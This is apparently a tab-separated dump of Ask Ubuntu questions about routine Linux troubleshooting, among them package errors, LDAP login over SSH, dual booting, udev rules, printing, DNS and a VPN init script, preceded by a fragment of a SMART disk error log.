40 00 03:49:41.973 write fpdma queued 61 08 f8 78 7d 7e 40 00 03:49:41.972 write fpdma queued 61 08 f0 40 7d 7e 40 00 03:49:41.972 write fpdma queued 61 08 e8 88 72 7e 40 00 03:49:41.972 write fpdma queued 61 08 e0 d0 5e 7e 40 00 03:49:41.972 write fpdma queued error 104 occurred at disk power-on lifetime : 3337 hours ( 139 days + 1 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 52 6a 9d bb 64 error : wp at lba = 0x04bb9d6a = 79404394 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 61 08 78 f0 04 bd 40 00 03:49:37.805 write fpdma queued 61 08 70 20 03 bd 40 00 03:49:37.804 write fpdma queued 61 08 68 08 03 bd 40 00 03:49:37.804 write fpdma queued 61 10 60 e8 02 bd 40 00 03:49:37.803 write fpdma queued 61 03 58 d8 f2 6f 40 00 03:49:37.803 write fpdma queued smart self-test log structure revision number 1 no self-tests have been logged . [ to run self-tests , use : smartctl -t ] smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
262424	can not update : `` installation or removal of a software package failed . ''	i have n't been able to update of late . the details are as follows : installarchives ( ) failed : preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % dpkg : unrecoverable fatal error , aborting : files list file for package 'dropbox ' is missing final newline error in function : if i remove dropbox , will i be able to update and subsequently reinstall dropbox ? i would note that none of the updates mention dropbox , if that makes a difference . i have checked the following question but was hesitant to follow the suggestions because i do n't want an unintentional upgrade to 12.10 : how to resolve `` the installation or removal of a software package failed '' ? any help would be appreciated .
262425	how to configure pam.d files for ldap over ssh on 12.04 ?	i 'm trying to set up an ubuntu 12.04 server so that users with a valid account in a remote ldap server can login to the ubuntu server . i 've followed this guide closely : http : //wiki.linuxquestions.org/wiki/pam_ldap . when i try to ssh into that machine , this is what i see in /var/log/auth.log before entering my password : connection from 192.168.0.10 port 36624 invalid user bentrupk from 192.168.0.10 input_userauth_request : invalid user bentrupk [ preauth ] however , using a packet sniffer , i 'm also seeing a successful query to the ldap server using my username that returns my dn in ldap . then i enter my password but the packet sniffer shows an ldap bind request with the right dn but with a password of `` ... .incorrect '' . obviously , that 's not the password what i entered . i 'm assuming it 's a problem with 1 or more of my pam.d config files . i 'm wondering if there is a hint from the `` invalid user '' in the auth.log ? there is clearly a request being made to the ldap server with the username provided by ssh before i enter my password that successfully returns the correct entry . however , it 's unclear to me which happens first : `` invalid user '' in the auth.log or the ldap search seen in the packet sniffer ( and just to be clear the ssh user does not have a local account ) . what can i do to debug this further or confirm that i have the right configuration ?
262426	boot error - [ 22,874755 ] ext4-fs ( sda2 ) : unrecognized mount option `` x-gvfs-name=ubuntu '' or missing value	i receive the above error message , followed by : root filesystem check failed . a maintenance shell will now be started . root @ xxxx : ~ # how do i fix this ? i have ubuntu 12.10 . i had previously made changes in the `` disk '' application , under `` edit file system label '' . what i wanted to do is label my 3 partitions : windows , ubuntu , and swap . how can i do this without causing a boot error ? i am using the ubuntu live cd to get to the internet . thanks , a4skyhawk
262429	ubuntu 12.04 grub error on sony vaio z	i am new linux user and i am trying to install ubuntu 12.04.2 amd64 on my sony vaio z . however , there is an error at the end of the installation process in which the boot loader was not located . ( using usb for the installation ) thanks
262432	native resolution not available in displays ( unity )	i have an nvidia geforce 9600 gt with dual dvi connections in a desktop computer . scenario 1 : dvi-1 is connected via dvi cable to a 22 '' samsung panel . ubuntu 12.04.2 64-bit is running successfully . at/after installation , by default the `` post-release-update ( version current-updates ) '' restricted nvidia driver was installed and working . scenario 2 : after shutting down the computer , i moved the 22 '' to dvi-0 and added a 19 '' lg onto dvi-1 . this monitor only has a vga connector , so i used a dvi to vga converter . i booted the machine and the bios , etc . appeared on the 22 '' , as did the ubuntu logon screen . the 19 '' showed a wallpaper without any logon , just at the wrong resolution . after logging in , i went to displays and adjusted the resolution for the 19 '' . the closest is 1360x768 . the monitor 's native resolution ( i pressed auto-adjust on the monitor to confirm ) is 1366x786 . the display is not crisp -- it 's showing the standard blurriness when not at the native resolution . the 19 '' appears in displays as `` unknown '' , even after pressing `` detect displays '' . the cable is not loose and i tried with a different vga cable . also , moving windows around on the 22 '' is now creating visual tearing . all in all , it 's not worth the effort at the moment ... question : to set the correction resolution for the 19 '' , am i back to manually hacking multiple-monitors via xrandr each time i boot and/or fiddling around with different nvidia drivers ?
262433	something like 'mac os x exposé ' / 'compiz scale ' / 'kde present windows ' in openbox / lxde / xfce ?	is there a de-independent utility to show all windows beside each other ( i.e . emulate mac os x exposé behavior ) in more lightweight des like openbox , lxde or xfce ? something like this :
262450	ca n't log in although password is correct	im fairly new to ubuntu so bear with me on this . i was doing an assignment for my csci 323 class that required manually adding a new user and my problem came about after i followed these instructions : [ step 5 - set owner/group for the home directory . make joe the owner and group id of the directory . use the chown and chgrp commands to set this , if necessary ( if you need help with these commands , try the man pages ) . hint : try using the command `` chown joe : joe joe '' to change the owner and group on the users home directory with one command . next , set the permissions for the directory . i wo n't go into details on binary or octal numbers here , but you 'll want to set the permissions so that the owner as read , write , and execute permissions and group and world has no permissions . do this with the following command : chmod 700 ] i thought i did it correctly , but upon logging out and trying to log back in , i found that i could not log into any account anymore . whenever i enter my password , the screen flashes black and shows some code for half a second and returns . i tried logging in via ctrl+alt+f2 but my password is incorrect for my admin account but it does allow me to get on the demo account i made . i have a feeling i screwed up with the group id and owner . any help would be much appreciated .
262455	ga-h77m-d3h problems ( i do n't recommend this motherboard for ubuntu . )	i have a new gigabyte ga-h77m-d3h motherboard and it works ok , except the integrated atheros gbe lan chip ( ar8161 gigabit ethernet ) . atheros communications inc. ar8161 gigabit ethernet i installed linux-backports-modules-cw-3.6 package and ethernet has been detected and apparently works fine , but when i browse ( firefox and chrome browsers tested ) in multimedia pages , for example in youtube.com , the internet connection is lost ( eth0 is up ) . the problem in more habitual in webs using flash , but in other pages occurs too . in syslog and dmesg i view nothing strange . i disabled this ethernet in the bios and i installed a new rtl8169sc . the problem persist , but is less habitual . i have uninstalled flashplugin and use html5 mode in youtube , but the problem persist . i do n't know where i can watch . any suggestion ? my system : 3.5.0-25-generic x86_64 ubuntu 12.10 update : after few hours running , the computer is freeze . i think the problem now is the sound . only occurs when i am playing music with clementine or rhythmbox . i do n't recommend this motherboard for ubuntu . update : some times , errors in : `` /usr/lib/upower/upowerd '' ! ! ! update : more problems and one solution , replace motherboard with other : disabling irq # 16 and *bad*gran_size
262466	why does update manager dowload the full package as update ?	why does update manager download full packages which already installed ? for example , when there is an update for firefox or virtualbox or any other software , the update manager shows that it 's downloading it from scratch .
262468	how to force ubuntu touch to be in landscape on nexus 7	i was wondering how i could force my nexus 7 to run ubuntu touch in landscape and have side-stages . could anyone help me with this ?
262469	udev : no takes rule for gps	i 'm trying to create a udev rule for a gps . i tried several ways but can not get the device to be captured by the rule : lsusb : bus 002 device 007 : id 067b:2303 prolific technology , inc. pl2303 serial port udevadm info -a -p $ ( udevadm info -q path -n /dev/ttyusb0 ) udevadm info starts with the device specified by the devpath and then walks up the chain of parent devices . it prints for every device found , all possible attributes in the udev rules key format . a rule to match , can be composed by the attributes of the device and the attributes from one single parent device . looking at device '/devices/pci0000:00/0000:00:10.0/usb2/2-1/2-1:1.0/ttyusb0/tty/ttyusb0 ' : kernel== '' ttyusb0 '' subsystem== '' tty '' driver== '' '' looking at parent device '/devices/pci0000:00/0000:00:10.0/usb2/2-1/2-1:1.0/ttyusb0 ' : kernels== '' ttyusb0 '' subsystems== '' usb-serial '' drivers== '' pl2303 '' attrs { port_number } == '' 0 '' looking at parent device '/devices/pci0000:00/0000:00:10.0/usb2/2-1/2-1:1.0 ' : kernels== '' 2-1:1.0 '' subsystems== '' usb '' drivers== '' pl2303 '' attrs { binterfacenumber } == '' 00 '' attrs { balternatesetting } == '' 0 '' attrs { bnumendpoints } == '' 03 '' attrs { binterfaceclass } == '' ff '' attrs { binterfacesubclass } == '' 00 '' attrs { binterfaceprotocol } == '' 00 '' attrs { modalias } == '' usb : v067bp2303d0300dc00dsc00dp00icffisc00ip00 '' attrs { supports_autosuspend } == '' 1 '' looking at parent device '/devices/pci0000:00/0000:00:10.0/usb2/2-1 ' : kernels== '' 2-1 '' subsystems== '' usb '' drivers== '' usb '' attrs { configuration } == '' '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmattributes } == '' 80 '' attrs { bmaxpower } == '' 100ma '' attrs { urbnum } == '' 20 '' attrs { idvendor } == '' 067b '' attrs { idproduct } == '' 2303 '' attrs { bcddevice } == '' 0300 '' attrs { bdeviceclass } == '' 00 '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { bnumconfigurations } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { speed } == '' 12 '' attrs { busnum } == '' 2 '' attrs { devnum } == '' 7 '' attrs { version } == '' 1.10 '' attrs { maxchild } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { authorized } == '' 1 '' attrs { manufacturer } == '' prolific technology inc. '' attrs { product } == '' usb-serial controller '' looking at parent device '/devices/pci0000:00/0000:00:10.0/usb2 ' : kernels== '' usb2 '' subsystems== '' usb '' drivers== '' usb '' attrs { configuration } == '' '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmattributes } == '' e0 '' attrs { bmaxpower } == '' 0ma '' attrs { urbnum } == '' 157 '' attrs { idvendor } == '' 1d6b '' attrs { idproduct } == '' 0001 '' attrs { bcddevice } == '' 0206 '' attrs { bdeviceclass } == '' 09 '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { bnumconfigurations } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { speed } == '' 12 '' attrs { busnum } == '' 2 '' attrs { devnum } == '' 1 '' attrs { version } == '' 1.10 '' attrs { maxchild } == '' 2 '' attrs { quirks } == '' 0x0 '' attrs { authorized } == '' 1 '' attrs { manufacturer } == '' linux 2.6.32-34-generic-pae uhci_hcd '' attrs { product } == '' uhci host controller '' attrs { serial } == '' 0000:00:10.0 '' attrs { authorized_default } == '' 1 '' looking at parent device '/devices/pci0000:00/0000:00:10.0 ' : kernels== '' 0000:00:10.0 '' subsystems== '' pci '' drivers== '' uhci_hcd '' attrs { vendor } == '' 0x1106 '' attrs { device } == '' 0x3038 '' attrs { subsystem_vendor } == '' 0x1106 '' attrs { subsystem_device } == '' 0x3038 '' attrs { class } == '' 0x0c0300 '' attrs { irq } == '' 21 '' attrs { local_cpus } == '' ff '' attrs { local_cpulist } == '' 0-7 '' attrs { modalias } == '' pci : v00001106d00003038sv00001106sd00003038bc0csc03i00 '' attrs { enable } == '' 1 '' attrs { broken_parity_status } == '' 0 '' attrs { msi_bus } == '' '' looking at parent device '/devices/pci0000:00 ' : kernels== '' pci0000:00 '' subsystems== '' '' drivers== '' i tried with these rules , i tried with these rules , but none works : # drivers== '' sierra '' , subsystems== '' usb '' , attrs { binterfacenumber } == '' 03 '' , symlink= '' ttyacm10 '' # drivers== '' pl2303 '' , subsystems== '' usb-serial '' , attrs { idvendor } == '' 067b '' , attrs { idproduct } == '' 2303 '' , attrs { binterfacenumber } == '' 00 '' , symlink= '' ttygps '' # drivers== '' pl2303 '' , subsystems== '' usb-serial '' , attrs { idvendor } == '' 067b '' , attrs { idproduct } == '' 2303 '' , attrs { manufacturer } == '' prolific technology inc. '' , attrs { port_number } == '' 0 '' , symlink= '' ttygps '' # drivers== '' pl2303 '' , subsystem == `` usb-serial '' , attrs { serial } == '' 0000:00:10.0 '' , symlink= '' ttyagsp '' # drivers== '' pl2303 '' , subsystem== '' tty '' attrs { idvendor } == '' 067b '' , attrs { idproduct } == '' 2303 '' , attrs { serial } == '' 0000:00:10.0 '' , symlink= '' ttygps '' the system ever generate the following symlink : [ 4516.789581 ] pl2303 2-1:1.0 : pl2303 converter detected [ 4516.803239 ] usb 2-1 : pl2303 converter now attached to ttyusb0 any fix to it ? thanks ! !
262472	is there a command to refresh the applications listed on the dash ?	sometimes , after installing an application ( codeweavers crossover to be more specific on this case ) it fails to show on the dash until you logout and back on , that happens with unity and gnome shell , remember that with gnome fallback it is automatically added as a menu . is there a command that allows one to force a refresh on the cached application launchers in the unity dash or the gnome-shell desktop environments ?
262478	sd card mounting trouble	i 've looked through the other questions regarding this issue , i ca n't pin down what my specific problem is $ lsusb bus 001 device 004 : id 05e3:0727 genesys logic , inc. microsd reader/writer bus 001 device 003 : id 0ac8 : c33f z-star microelectronics corp. webcam bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub $ sudo lspci 00:00.0 host bridge : intel corporation atom processor d4xx/d5xx/n4xx/n5xx dmi bridge 00:02.0 vga compatible controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller 00:02.1 display controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) 00:1f.2 sata controller : intel corporation nm10/ich7 family sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 05:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 09:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller $ dmesg | tail [ 2637.679450 ] sd 6:0:0:0 : > [ sdb ] write protect is off [ 2637.679467 ] sd 6:0:0:0 : > [ sdb ] mode sense : 03 00 00 00 [ 2637.680702 ] sd 6:0:0:0 : > [ sdb ] no caching mode page present [ 2637.680719 ] sd 6:0:0:0 : > [ sdb ] assuming drive cache : write through [ 2637.687557 ] sd 6:0:0:0 : > [ sdb ] no caching mode page present [ 2637.687570 ] sd 6:0:0:0 : > [ sdb ] assuming drive cache : write through [ 2637.688984 ] sdb : sdb1 [ 2637.695422 ] sd 6:0:0:0 : > [ sdb ] no caching mode page present [ 2637.695439 ] sd 6:0:0:0 : > [ sdb ] assuming drive cache : write through [ 2637.695450 ] sd 6:0:0:0 : > [ sdb ] attached scsi removable disk $ ls -la /dev/sd* brw-rw -- -- 1 root disk 8 , 0 feb 28 14:47 /dev/sda brw-rw -- -- 1 root disk 8 , 1 feb 28 14:47 /dev/sda1 brw-rw -- -- 1 root disk 8 , 2 feb 28 14:47 /dev/sda2 brw-rw -- -- 1 root disk 8 , 5 feb 28 14:47 /dev/sda5 brw-rw -- -- 1 root disk 8 , 16 feb 28 15:30 /dev/sdb brw-rw -- -- 1 root disk 8 , 17 feb 28 15:30 /dev/sdb1 i 'm using a samsung n150 netbook , i 've tried manually mounting it using mount -t vfat /dev/sdb1 /mnt but it said it was the wrong fs type , even though i 'm 100 % sure it 's fat32 .
262482	ubuntu 12.10 - set alternating row colors in gtk3 treeview	ubuntu used to have alternating row colors for gtk treeview widgets . some applications still do , like banshee . alternating row colors would really help my application ( written in python 2.7 , and using gi.repository and not pygtk ) that i 'm developing . i know i can set a hint with treeview.set_rules_hint ( true ) this is n't working , however . does anyone know how to enable the alternating row colors ?
262485	is there a bzr command to see all branches of a project on launchpad ?	if you visit a project on launchpad , you can see all active branches of all developers involved in a project . is there a bzr command to do the same without visiting launchpad in a browser ?
262487	install postgresql on ubuntu dependency errors	i just installed a bitnami ruby stack ( ubuntu , rails , rub , ... ) . i would like to install postgresql . i tried the following command : sudo apt-get install postgresql but , i get this : reading package lists ... done building dependency tree reading state information ... done package postgresql is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source update1 i tried this : sudo apt-get install postgresql-9.1 and got this : the following packages have unmet dependencies : postgresql-9.1 : depends : libldap-2.4-2 ( > = 2.4.7 ) but it is not installable depends : libpq5 ( > = 9.1~ ) but it is not going to be installed depends : postgresql-client-9.1 but it is not going to be installed depends : postgresql-common ( > = 115~ ) but it is not installable depends : ssl-cert but it is not installable e : unable to correct problems , you have held broken packages . update2 this is the first time i have logged on via terminal from my imac . i guess i 'm in a user directory . what directory do i need to be in for the install to work ? thanks for the help ! !
262489	how can i print over network again ?	i used to be able to print over the network , but then one day i received this message : /usr/lib/cups/backend/lpd failed this is a printer that i installed myself through the administration > printing ( lucid 10.04 gnome ui ) . from the shell , it looks good : $ lpq xerox is ready no entries here are the last few lines of the error log : $ cat /var/log/cups/error_log d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] state : +connecting-to-device d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] looking up `` cups-server.linfield.edu '' ... ` d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] connecting to cups-server.linfield.edu:515 for printer d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] connecting to printer ... d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] state : -connecting-to-device d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] connected to printer ... d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] connected to 10.171.255.15:515 ( ipv4 ) ( local port 1023 ) ... d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] lpd_command 02 d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] sending command string ( 2 bytes ) ... d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] reading command status ... d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] lpd_command returning 1 d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] backend returned status 1 ( failed ) d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] end of messages d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] printer-state=3 ( idle ) d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] printer-state-message= '' /usr/lib/cups/backend/lpd failed '' d [ 28/feb/2013:14:07:11 -0800 ] [ job 472 ] printer-state-reasons=none i am at a loss for what to do now . i have tried these things : deleted the printer and reinstalled it turned the printer off and on stopped and restarted cups any ideas ? is this something that has to be fixed at the system administrator level ?
262491	connect to a wpa2-enterprise connection via cli ( no desktop )	i 've finally installed the drivers for my wireless adapter , however , i ca n't seem to find anything explaining out to connect to a wpa2-enterprise connection . i 've found many wpa/wep/wpa2 explanations , however , these do n't solve my situations . is there any way to do this ? i 'm currently cli only , thanks !
262495	dual boot windows 7 and ubuntu 12.10 . i have to use the bios to choose at boot	ive been at this all week . ive tried installing ubuntu first , windows first , installing to separate drives , installing to the same drive with partitions and i cant get anything to work right . current setup i have windows7 installed on a 120gb ssd . i installed ubuntu to a 500gb hdd and let it do automatic partitioning . i can choose these seprate drives in my bios and boot from one or the other that way but i cant get grub2 to work or the windows boot loader . the windows boot loader just shoots me to grub and grub2 says error invalid efi file path when i try to boot windows . i booted into ubuntu and did sudo update-grub still doesnt work . i installed easybcd on the windows side but no luck there either . also here is a boot summary from boot rapair http : //paste.ubuntu.com/5574958/ help would be greatly appreciated and i swear ive searched high and low but i cant seem find an answer to my problem .
262497	modified hd-media initrd.gz causing kernel panic	my problem relates to modifying the contents of the hd-media initrd.gz . i am customising ubuntu 12.10 server . i want the early and late commands of the installer to be able to run a couple of shell scripts , so i want to add the scripts to the hd-media initrd image . for the record , i am booting and installing from usb drive . i have it all working , a completely unattended , offline install , from the usb stick . i 've also made a net boot/install and successfully modified the initrd.gz for the net installer . the same technique does n't work when i modify the hd-media initrd.gz though . here 's what i 've done : ( on the bootable partition on the usb stick ) # cd /install # mkdir tmp # gunzip initrd.gz # cd tmp # cat ../initrd | cpio -ivd ( cpio image is unpacked into /install/tmp on the usb drive ) # mkdir usr/local # cp ../script1.sh ../script2.sh usr/local ( scripts are now in place in the initrd . time to recompress ) # find | cpio -o -h newc > ../newinitrd # cd .. ( steps to recompress and backup the original initrd.gz skipped here ) # mv newinitrd initrd # gzip -9 initrd # rm -rf tmp so now when i boot with this modified initrd.gz the kernel panics , saying `` not syncing '' and that it ca n't find init , and perhaps i should use the init = ... kernel option . init is right where i left it though , and , not suprisingly , the kernel option does n't help . what is odd is that the new uncompressed image is slightly smaller than the original uncompressed image . that seems weird given that i added two files to it . i 've tried various forms of the cpio command : -h crc , no format arg at all resulting in default archive format , -r 0:0 , -l. i 've also tried different forms of the find command , e.g . find . find . -depth -print0 find -depth -print0 find . -print none of that made any difference though . so what i would like to know is what 's the secret source in the hd-media initrd image ? ? can anyone help me to understand why my slightly modified hd-media initrd.gz causes my hd-media kernel to panic ? ? why is the modified initrd slightly smaller , despite having more in it ? any insights would be greatly appreciated . thanks .
262502	activating usb audio with /etc/pm/sleep.d script that runs pacmd commands	ubuntu annoyingly switches the device for audio input and output from my usb headset to the built-in sound card every time i log out , hibernate , or shut down my computer . this takes place even though `` usb headset analog stereo '' has the `` set as fallback option '' selected in pulseaudio . i decided to run a script every time my computer starts or thaws . getting the commands to run when i log in is easy : i just put them in my .zshrc file . but i 'm having trouble getting them to run when waking from hibernation . here it is my script , which i put in /etc/pm/sleep.d : # ! /bin/bash case `` $ 1 '' in thaw|resume ) pacmd set-default-sink `` alsa_output.usb-sennheiser_communications_sennheiser_usb_headset-00-headset.analog-stereo '' pacmd set-default-source `` alsa_output.usb-sennheiser_communications_sennheiser_usb_headset-00-headset.analog-stereo.monitor '' ; ; esac the problem is that it does n't execute the pacmd commands when thawing ( i do n't suspend my computer because it freezes when it resumes ) . i 've tried numerous variations on the script , including putting the pacmd commands outside the case statement so that they ( it would seem ) execute regardless , but to no avail . when i put other commands ( such as gvim ) in the script and hibernate and thaw my computer , they do n't execute either . the commands do execute , however , if they are outside the statement and i run the script at the command line . if i put the commands in a script in /etc/pm/power.d outside a case statement , they execute twice .
262503	can you triple-boot safely ?	i would love to triple-boot windows xp pro , ubuntu 12.10 , and backtrack 5 r3 , but is this safe for my harddrive/other oss on the computer ?
262510	dns suddenly broken in ubuntu virtualbox	my ubuntu 12.04 virtualbox ( windows 7 host ) suddenly stopped connecting to remote servers unless i refer to them by their ip addresses . i 'm looking for a way to fix this problem ( or at least to troubleshoot it ) . note : neither restarting the vb nor restarting the host machine fixed the problem . important : the vb has been operating flawlessly since it was set up several months ago . furthermore , i did not make any changes to the configurations , settings , etc . of either the guest or the host machine in the last several days . ( afaict , the loss of dns just happened out-of-the-blue . ) since the configurations of the guest and host machines have been so successful until now , in general i want to stay clear of solutions that would involve changing them . ( of course , this does not apply to configuration files that get modified frequently by automated process , such as resolv.conf , since it is not unusual for such a file to become corrupted during normal operation . ) fwiw : my /etc/network/interfaces file consists of only the following two lines : auto lo iface lo inet loopback furthermore , my /etc/resolv.conf file ( which is not a symlink to ../run/resolvconf/resolv.conf ) has one search line , showing my workplace 's network 's domain , followed by two nameserver lines ; the hosts corresponding to the ip addresses mentioned in these two lines are both up , according to ping . just to be clear , i did not create or edit either of these files . % ifconfig -a eth0 link encap : ethernet hwaddr 61:39 : ba:21 : c7 : cc inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : 2fd1 : :f92:2c24:7735 : e9ac/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:946 errors:0 dropped:0 overruns:0 frame:0 tx packets:995 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:122625 ( 122.6 kb ) tx bytes:96928 ( 96.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:10 errors:0 dropped:0 overruns:0 frame:0 tx packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1380 ( 1.3 kb ) tx bytes:1380 ( 1.3 kb )
262513	restoring nexus 4 to factory image	i have been attempting to restore the factory image of 4.2.1 through the terminal in ubuntu , but the whole progress halts when i try to use the ./flash-all.sh commands . it sits in the `` waiting for device '' screen and goes nowhere . i ca n't help to think that i am missing something . i just ca n't seem to figure it out .
262514	refresh unity ui time by command line	i have a ubuntu 12.04 desktop virtual machine ran by vmware and having some issue with the gui clock/time what ever it is called . the thing in the right corner showing the time . when i put the laptop in sleep mode , it does not put the virtual machine to sleep nor suspend it and when i reopen the laptop , the same day or the following day , the clock is still at the time of the sleep mode action . eg : i put the laptop to sleep at 4:45 pm , when i reopen it , the virtual machine is still at 4:45 pm , and will stay like that until ... something . i 've found a way to `` fix '' it by going to the date and setting and just pressing ok , and then it synchronizes it within the next 5-10 minutes . but still it annoys me and i was wondering if there is a way to force the gui clock to synchronize . from my setting it is synchronized with internet but it does not synchronize often and having to go to the settings , and then having to wait at least 5 mins kind of annoys me . so i was wondering if there is a way to force the synchronization from command-line ? i do have read this post but that was n't the same problem and that was the closest question i found that was a bit similar to mine .
262517	dhcp help in virtual box	new to linux and ubuntu - ya noob , be gentle . i have a windows 7 host , running latest virtual box , created an ubuntu 12.10 server installation . everything seemed to go fine , i chose all defaults both for the virtual box settings and for the ubuntu server install . i only chose to add samba file server and lamp installs . i chose the default network adapter in vbox , only 1 adapter set for nat - but i do n't believe the ubuntu server install is binding properly . forum wo n't let me paste a screen shot - effectively ifconfig shows no ip address bound on eth0 . in /etc/network/interfaces config i did n't change anything , and it has eth0 bound to dhcp - so seems like that is default setting . i 'm just trying to learn ubuntu , so want a very basic setup - what did i miss to bind the network adapter ? did a search here in forums first , could n't find a related post . any suggestions welcome , thx
262521	wo n't dual boot -- -goes straight to ubuntu	i have a windows 7 computer . this is what i did : using windows disk management , shrunk the available hard drive producing a partition more than large enough for ubuntu . changed the boot order in bios to cd , usb , hdd . inserted ubunto 12.04 disk , launched ubuntu . chose `` install alongside windows 7 '' . successfully installed ubuntu , restarted , and it goes straight to ubuntu . no text screen to choose windows 7 or ubuntu . just straight ubuntu . i can see the 2 normal windows partitions , in ubuntu , access the data i want from it , but can not get it to allow me to use windows as well . any advice would be greatly appreciated . i 'm somewhat experienced with windows/dos , and utterly clueless regarding ubuntu/linux . please understand i am semi-tech literate .
262522	how to run shell script commands manually	i 'm running ubuntu on my samsung arm chromebook in chroot via crouton . i 'm trying to run cisco anyconnect vpn in ubuntu and ran into an issue . it installs but the daemon wo n't start . i found a description of the issue here : https : //github.com/dnschneid/crouton/issues/15 so i found the shell script for anyconnect in /etc/init.d but i 'm not smart enough to figure out how to run these commands manually . i 'm hoping someone can point me in the right direction . here are the contents of the vpnagentd_init file : # ! /bin/sh # # chkconfig : 345 85 25 # description : vpnagentd is used for managing the cisco vpn client datapath . # processname : vpnagentd # source function library . if [ -e `` /etc/init.d/functions '' ] ; then . /etc/init.d/functions fi retval=0 start ( ) { # if tun is n't supported by the kernel , try loading the module ... /sbin/lsmod | grep tun > /dev/null if [ $ ? -ne 0 ] ; then /sbin/modprobe tun > /dev/null 2 > /dev/null if [ $ ? -ne 0 ] ; then # check for /dev/net/tun [ -c `` /dev/net/tun '' ] || echo warning : unable to verify that the tun/tap driver is loaded . contact your system administrator for assistance . fi fi echo -n $ '' starting up cisco vpn daemon `` /opt/cisco/vpn/bin/vpnagentd retval= $ ? echo return $ retval } stop ( ) { echo -n $ '' shutting down cisco vpn daemon `` killall vpnagentd retval= $ ? echo return $ retval } dostatus ( ) { status vpnagentd } restart ( ) { stop start } # see how we were called . case `` $ 1 '' in start ) start ; ; stop ) stop ; ; restart ) restart ; ; status ) dostatus ; ; * ) echo $ '' usage : vpnagent { start|stop|restart|status } '' exit 1 esac exit $ retval
